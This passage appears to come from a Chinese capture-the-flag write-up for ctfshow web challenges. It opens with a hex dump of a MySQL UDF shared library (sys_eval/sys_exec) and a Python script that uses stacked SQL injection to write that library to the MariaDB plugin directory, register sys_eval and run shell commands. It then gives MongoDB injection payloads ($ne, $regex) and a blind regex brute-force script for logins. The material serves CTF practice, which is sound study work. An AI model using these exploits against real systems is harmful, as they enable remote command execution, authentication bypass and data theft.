00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400'
codes=[]
for i in range(0,len(code),128):
    codes.append(code[i:min(i+128,len(code))])
 
#建临时表
sql='''create table temp(data longblob)'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#清空临时表
sql='''delete from temp'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#插入第一段数据
sql='''insert into temp(data) values (0x{})'''.format(codes[0])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#更新连接剩余数据
for k in range(1,len(codes)):
    sql='''update temp set data = concat(data,0x{})'''.format(codes[k])
    payload='''0';{};-- A'''.format(sql)
    requests.get(url+payload)
 
#10.3.18-MariaDB    
#写入so文件
sql='''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#引入自定义函数
sql='''create function sys_eval returns string soname 'udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#命令执行,结果更新到界面
sql='''update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)
 
#查看结果
r=requests.get(url[:-4]+'?page=1&limit=10')
print(r.text)

web249

nosql

NoSQL注入小笔记

冷门知识 — NoSQL注入知多少

$gt : >
$lt : <
$gte: >=
$lte: <=
$ne : !=、<>
$in : in
$nin: not in
$all: all 
$or:or
$not: 反匹配(1.3.3及以上版本)
模糊查询用正则式:db.customer.find({'name': {'$regex':'.*s.*'} })
/**
* : 范围查询 { "age" : { "$gte" : 2 , "$lte" : 21}}
* : $ne { "age" : { "$ne" : 23}}
* : $lt { "age" : { "$lt" : 23}}
*/

//查询age = 22的记录
db.userInfo.find({"age": 22});
//相当于:select * from userInfo where age = 22;
//查询age > 22的记录
db.userInfo.find({age: {$gt: 22}});
//相当于:select * from userInfo where age > 22;

image-20220409144401243

image-20220409144445953

这题后端对id过滤了非数字,可能用的intval函数。这个函数在PHP特性那里出现过很多次了,利用这个特性:

image-20220409144506190

?id[]=flag

image-20220409144557902

web250

image-20220409144722019

  $query = new MongoDB\Driver\Query($data);
  $cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();

//无过滤
  if(count($cursor)>0){
    $ret['msg']='登陆成功';
    array_push($ret['data'], $flag);
  }

没有任何的过滤,利用$ne就可以了

username[$ne]=1&password[$ne]=1

正则也可以

username[$regex]=.*&password[$regex]=.*

image-20220409150349590

web251

image-20220409150536078

image-20220409150527537

这次返回的是admin 的密码

改成username不等于admin

username[$ne]=admin&password[$ne]=1

image-20220409150627591

web252

username[$ne]=admin&password[$ne]=1

image-20220409151108797

username既不能是admin,也不能是admin1,那就正则表达式

username[$regex]=^[^a].*$&password[$ne]=1

image-20220409151155741

web253

image-20220409151505085

mongodb的find().pretty()方法的作用。
使得查询出来的数据在命令行中更加美观的显示,不至于太紧凑。
"""
Author : feng
Time : 2021-2-14
"""
import requests

url="http://2184e9b4-619a-43dd-b8de-015a6a74fe3d.chall.ctf.show:8080/api/"

flag=""

for i in range(1,100):
    for j in "{-abcdefghijklmnopqrstuvwxyz0123456789}":
        payload="^{}.*$".format(flag+j)
        data={
            'username[$regex]':'flag',
            'password[$regex]':payload
        }
        r=requests.post(url=url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag+=j
            print(flag)
            if j=="}":
                exit()
            break

参考

bfengj

Y4tacker

;